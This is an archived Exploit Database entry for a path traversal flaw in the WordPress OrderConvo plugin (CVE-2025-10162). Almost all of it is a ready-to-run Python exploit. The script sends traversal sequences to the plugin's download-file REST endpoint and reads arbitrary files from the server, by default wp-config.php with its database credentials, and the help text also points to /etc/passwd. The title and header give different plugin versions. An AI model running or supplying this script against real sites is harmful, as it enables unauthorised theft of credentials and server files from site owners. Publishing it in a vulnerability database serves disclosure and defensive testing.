[webapps] WordPress OrderConvo 14 - Path Traversal
Exploit DB
Archived Jun 01, 2026
✓ Full text saved
WordPress OrderConvo 14 - Path Traversal
Full text archived locally
EXPLOIT DATABASE
EXPLOITS
GHDB
PAPERS
SHELLCODES
SEARCH EDB
SEARCHSPLOIT MANUAL
SUBMISSIONS
ONLINE TRAINING
WordPress OrderConvo 14 - Path Traversal
EDB-ID:
52607
CVE:
2025-10162
EDB Verified:
Author:
DIAMORPHINE
Type:
WEBAPPS
Exploit: /
Platform:
MULTIPLE
Date:
2026-06-01
Vulnerable App:
# Exploit Title: WordPress OrderConvo 14 - Path Traversal
# Date: 05-31-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.najeebmedia.com/
# Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
# Version: 13.5
# Tested on: Debian
# CVE : CVE-2025-10162
import httpx
import asyncio
import argparse
from urllib.parse import urljoin
import sys
async def main(base_url, file):
async with httpx.AsyncClient(verify=False) as client:
try:
print('[*] Checking connection to target')
req = await client.get(url=base_url)
if req.status_code == 200:
print('[+] The target is alive, exploiting\n')
else:
print(f'[-] Unable to connect to the target. Code: {req.status_code}')
sys.exit()
except:
print(f'[-] Problem with connection to the target.')
sys.exit()
exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}')
r = await client.get(url=exp_url)
if len(r.text) != 0:
print(r.text)
else:
print("[*] Unable to read file")
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162")
parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local")
parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)")
args = parser.parse_args()
if __name__ == '__main__':
asyncio.run(main(args.url, args.filename))
Copy
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services